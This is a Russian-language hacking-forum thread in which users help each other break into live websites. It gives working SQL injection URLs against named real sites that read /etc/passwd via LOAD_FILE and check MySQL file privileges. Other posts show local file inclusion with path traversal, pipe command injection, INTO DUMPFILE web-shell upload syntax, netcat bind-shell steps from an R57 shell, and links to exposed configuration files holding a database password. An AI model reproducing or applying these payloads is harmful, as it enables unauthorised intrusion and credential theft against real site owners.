https://forum.antichat.ru/threadnav34338-1-10.html
читал эту статью,так что не думай Joker что я не чего не читаю.
но там заливаеться шелл при помощи слэшов.

into+dumpfile+'/tmp/aaaaaaaaa11231.php'/*


У меня по всей видимости такое не прокатит? или я ошибаюсь??

Люди,что означает это ?

credit_card:x:1301:1001::/home/card:/usr/bin/passwd

/usr/bin/passwd не шелл же?))У других стоит но логин(нету то бишь),а у других норм - башик...

Помогите плиз. я так понял что надо открыть на серваке порт для начала. Я юзаю R57SHELL. Я выбрал

помогите плиз

У тебя цель - забиндить или бэкконнект замутить ? Если забиндить,то запусти netcat со своего компа или откуда-то ещё.Предварительно открой на шелле произвольный незанятый порт.Проверь с помощью grep(хз как) или средствами,которые уже существуют в шелле.Если твой порт отобразился - порт открыт.После этого берёшь netcat и запускаешь его со следуцюищми параметрами:

nc host port.Например: nc www.wiw.ru 35149

Если вылетит оболочка шелла с приглашением,то тебе повезло =).При бэкконнекте делай так,как сказал тебе мой дорогой Горе Gorev :):):).Если бинд не катит,то придётся брутить системных юзеров и получать шелл с правами,дабы сменить настройки фаера.Иногда права есть не только у рута+ админы косячат иногда жестко))).Проблемы с натом ? Бери нормальную тачку и вперёд)

Пипл,почему не читаются исходники рнр скриптов?! инклудом.В других подхостеровских папках читаются хтмл файлы...чем же рнр так отличается от хтмл ? Или же там такие жестки настройки даже для поддоменов хостеровских ?!

И ещё вопрос:в каких файлах на сервере может храниться префикс MySql ?

У меня по всей видимости такое не прокатит? или я ошибаюсь??
Без ковычек не прокатит.

Пипл,почему не читаются исходники рнр скриптов?! инклудом.В других подхостеровских папках читаются хтмл файлы...чем же рнр так отличается от хтмл ? Или же там такие жестки настройки даже для поддоменов хостеровских ?!

И ещё вопрос:в каких файлах на сервере может храниться префикс MySql ?


При инклюде файлы не читаются, а исполняются.

Спасибо.Только ща я понял разницу ))).Ппц...Spyder-у респект )))).

Кто знает,можно ли упростить вычисление md5 хэш функции,если известен один из составляющих её параметров? Например,при Digest авторизации передаётся несколько параметров.Несколько из них статичны(двоеточие,имя пользователя и имя засекреченной области).Всё остальное либо неизвестно,либо засекречено.Затем вычисляется от всей этой бурды md5 хэш.Также в случае нахождения коллизии этой функции,смогу ли я *пройти* в запрещённую область сервера ?)

md5 необратимая, дума. от того что ты знаеш хоть какието кусочки ничего не изменится

Жаль(((Неужели не нашли до сих пор дыр в алгоритме?(Я вот не понимаю вещь с защитой авторизации дигест метода...на кой чёрт она сдалась ? Полюбому нужен доступ к рнр,чтобы перехватить данные.А если есть доступ к рнр,то нафига так мудиться.Залил веб шелл,нашёл пароли...

Вообще-то можно ускорить процесс перебора, зная некие символы. Вот, например, пароль VcPLDeLbGR. Он десятисимвольный, брутится будет долго. Но скажем, ты знаешь несколько символов, н.п. VcPLDeLbGR. Т.е. получается, тебе надо сбрутить уже не 10, а 6 символов, а именно VcPLDeLbGR, т.е. вероятность подбора увеличивается почти в 2 раза. Но не все бруты поддерживают перебор по маске.

Есть локальный инлуд
сервак ngix

вопрос. Есть аналог логов у этого сервака как у апчача или чтонить подобное чтобы какимнибудь запросом вписать туду php код и зауинлудить его на выполнение?

Есть локальный инлуд
сервак ngix

вопрос. Есть аналог логов у этого сервака как у апчача или чтонить подобное чтобы какимнибудь запросом вписать туду php код и зауинлудить его на выполнение?
https://forum.antichat.ru/showthread.php?t=49775

https://forum.antichat.ru/showpost.php?p=1223380&postcount=19 вот тут

Я нарыл путь к конфигу nginx'a,но путей к логам дефолных не нашол. может ошибаюсь хз. Помогите мне неайти пути к логам из данного лога плиз. http://www.cyl.ru/index.php?page=3&lang=../../../../../usr/local/nginx/conf/nginx.conf%00

к сайту cyl.ru

пожалуйста.

2. вопрос

вот удалённое выполнение команд. подскажите как создать файл там с названием phpinfo.php c текстом <?phpinfo();?>

http://www.neilthompson.us/iec5qz8twrqk/fhist/page.pl?page=|ls|

плиз

nano phpinfo.php <?phpinfo();?>
файл создастся в случае наличия прав на запись.

//по ссылке не ходил.

Здравствуйте, извените за тупой вопрос :)
Нашел топ сайтов
http://wap-top.ru/top/stat.php?uid=14281
там ошибка
Warning: mysql_num_rows(): supplied argument is not a valid MySQL result resource in /home/top/web/wap-top.ru/htdocs/top/stat.php on line 51
Но если сматреть статистику другого сайта
http://wap-top.ru/top/stat.php?uid=14198
Ошибки не замечается...
Возможно ли как нибуть раскрутить?

Здравствуйте, извените за тупой вопрос :)
Нашел топ сайтов
http://wap-top.ru/top/stat.php?uid=14281
там ошибка
Warning: mysql_num_rows(): supplied argument is not a valid MySQL result resource in /home/top/web/wap-top.ru/htdocs/top/stat.php on line 51
Но если сматреть статистику другого сайта
http://wap-top.ru/top/stat.php?uid=14198
Ошибки не замечается...
Возможно ли как нибуть раскрутить?

Кроме раскрытия путей эта бага больше ничего не даст.

А что можно получить с помощью раскрытия путей?
Дайте ссылку на статью

А что можно получить с помощью раскрытия путей?
получить путь)

А что можно получить с помощью раскрытия путей?
Дайте ссылку на статью

Получить ты ничего не получишь, а вот если найдешь php инъект или скуль-инъект с правом на запись, то тогда полный путь может пригодиться.

Если работает LOAD_FILE или INTO DumPFILE то раскрытие пути нужно для определения дирректории..а иначе они бесполезны.

Раскрытие путей никогда не бывает бесполезным. Есть еще реверс ip и вообще, любая информация - информация. Надо просто уметь ей распорядиться

Pashkela бывает бесполезный. Как и скуля бывает беспалезная, и инклуд

Не думаю. Я все такие вещи складирую. Сегодня не пригодилась - завтра обязательно пригодится. Или послезавтра. Имхо.

Кто, что может подсказать (статьи, топики и т.д.) для выгодного использования одинакового ИП адреса нескольких ресурсов (один хостер)?
Интересно узнать все подробности для выгоды хакеру)

вот на сайтец левый наткнулся.Дак он выдает странную ошибку,сайт должен быть посвящен японским часам.вот ссыль _ttp://urbanjunkie.ru/
Выдаёт ошибку странного содержания :


SQL Error: Access denied for user 'u28586'@'localhost' (using password: YES) at /var/www/vhosts/urbanjunkie.ru/httpdocs/inc/dbconfig.inc line 4
Array
(
[code] => 1045
[message] => Access denied for user 'u28586'@'localhost' (using password: YES)
[query] => mysql_connect()
[context] => /var/www/vhosts/urbanjunkie.ru/httpdocs/inc/dbconfig.inc line 4
)


Мне нече не надо,просто может уязвимость какая на нём.

Люди,что означает это ?

credit_card:x:1301:1001::/home/card:/usr/bin/passwd

/usr/bin/passwd не шелл же?))У других стоит но логин(нету то бишь),а у других норм - башик...

Никто не ответил =(.Ещё вопрос: почему в файле /etc/passwd стоит хэш пароля?))

Версия Апача - 1.3.27

http://yarra.ics.uci.edu/umich2/getdoc1.php?rid=21595+union+select+concat_ws(0x3a, LOAD_FILE(0x2f6574632f706173737764)),2,3,4,5+limit +1,1/*

вто инъекция под рутом.

Вопрос 1. Почему не работает вот так а) (/etc/passwd) b) ('/etc/passwd')
вопрос 2. Возможно ли залить шелл туда?

Извиняюсь за нубский вопрос, но прошу помощи плиз.

1.magic_quotes_gpc,addslashes или ещё что-нибудь.
2.Зачем ты юзаешь concat_ws() ? Убери всё и сделай так:

http://yarra.ics.uci.edu/umich2/getdoc1.php?rid=21595+union+select+LOAD_FILE(0x2f6 574632f706173737764)/*

1.magic_quotes_gpc,addslashes или ещё что-нибудь.
2.Зачем ты юзаешь concat_ws() ? Убери всё и сделай так:

http://yarra.ics.uci.edu/umich2/getdoc1.php?rid=21595+union+select+LOAD_FILE(0x2f6 574632f706173737764)/*
Есть ли при таких абстоятельсвах возможность залить шелл?

Проверь права: select concat_ws(0x3a,user,file_priv) from mhsql.user where user=твой юзер в HEX

Если У - то можно полюбас.Если N - обломался,чуваг.

Проверь права: select concat_ws(0x3a,user,file_priv) from mhsql.user where user=твой юзер в HEX

Если У - то можно полюбас.Если N - обломался,чуваг.

Помоги составить этот запрос на данном примере плиз. Я просто новичок.

http://yarra.ics.uci.edu/umich2/getdoc1.php?rid=21595+union+select+LOAD_FILE(0x2f6 574632f706173737764),2,3,4,5+limit+1,1/*

http://yarra.ics.uci.edu/umich2/getdoc1.php?rid=-21595+union+select+unhex(hex(concat_ws(0x3a,user,f ile_priv))),2,3,4,5+from+mysql.user+where+user=0x7 26F6F74/*

Повезло

Даже вот так можно
http://yarra.ics.uci.edu/umich2/getdoc1.php?rid=-21595+union+select+unhex(hex(group_concat(0x0a,use r,0x3a,file_priv))),2,3,4,5+from+mysql.user/*

Спс. люди. А теперь мне помогите залить туда файл /tmp/phpinfo.php
с текстом <? phpinfo(); ?>

Я читал статьи на ачате, но там при заливке юзались ковычки и слэши а тут они вырублены. плиз подскажите


add

snake: ты её уже залил? помоги плиз соствит запрос.

http://yarra.ics.uci.edu/phpinfo.php
в помощь тебе, теперь залить станет легче...если конечно под запись найдешь диру))

А может и это поможет:

http://yarra.ics.uci.edu/bb/enrondemo/localhost/soa.properties

А может и это поможет:

http://yarra.ics.uci.edu/bb/enrondemo/localhost/soa.properties


спс за намёки. там пасс к БД. Но я очень прошу Вас помогите составить SQL запрос на заливку файла. Очень прошу плиз.

Через скулю ты там шелл не зальешь, т.к. magic quotes=on и двойной запрос не работает. Забудь

Через скулю ты там шелл не зальешь, т.к. magic quotes=on и двойной запрос не работает. Забудь

Понятно, просто чел под ником Велемир несколькими постами выше голову задурил что можно залить.

А вы видите ещё способ залития туда шелла?
Я думую что если там будет удалённое подключение Бд. то можно наверное тот пасс применить .

Есть ещё способы?